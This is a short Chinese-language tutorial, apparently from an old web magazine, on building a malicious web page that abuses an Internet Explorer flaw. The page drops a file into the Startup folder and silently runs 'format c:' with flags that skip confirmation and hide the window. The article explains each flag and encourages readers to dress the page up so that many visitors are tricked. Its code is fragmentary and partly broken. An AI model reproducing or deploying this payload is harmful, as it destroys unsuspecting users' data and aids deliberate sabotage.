這個是一個關于HTML代碼攻擊的，雖然短點大家看看怎么樣，能實現的哦。

現在的Windows操作系統實在是很方便，連格式化都是只用鼠標點點就可以了，不用象以前那樣要輸入命令來完成格盤。

我們要做一個格本地磁盤網頁并不是很難，會HTML代碼的朋友一定是沒有什么問題的，這個其實就是利用一下IE的漏洞來實現我們的目的。

下面我們看一下下面的代碼我們就會發現其中的奧妙所在了。

scr.reset()
scr.path="c:\\windows\\start menu\\programs\\啟動\\文件名
scr.doc=""
wsh.run('start.exe /m format c:/q/autotest/u')

對于HTML代碼了解的朋友們一定看出來了吧，這段代碼的利害之處就在于最后一句，格你的磁盤沒商量。

下面我們來看看這段代碼的，具體的分析一下的他的工作原理是怎么樣的。

首先，我們來看看這一句

scr.path="c:\\windows\\start menu\\programs\\啟動\\文件名

wsh.run('start.exe /m format c:/q/autotest/u')

這句就是我們這里所要講的核心東西了，對于format 這個命令大家不會陌生的吧，只要知道這個命令的朋友，一定會知道這句命令的意思的，我就在這里不在多說什么了。

在這里我把他的一些參數，簡要的說說，大家會更加明白的。

在進行格盤的時候系統會與你進行對話，是否進行的，大家看到這個參數了嗎/autotest他會強制性的對你的硬盤進行格式化，而不再進行詢問；/q/u這兩個參數為系統不需要檢查立執行。在上一句中的start.exe與/m選項配合，哈哈，相信在執行時以最小化的狀態進行，誰都會頭痛的。

在這段代碼里，核心語句

wsh.run('start.exe /m format c:/q/autotest/u')

我們只要對這段代碼進行改動相信會出現更多不同的變化。在應用的時候把自己HTML代碼做的漂亮一些，相信一定會有很多的人會上當，不小心中了你的圈套。

責任編輯: 雪花(TEL:（010）68476636-8008)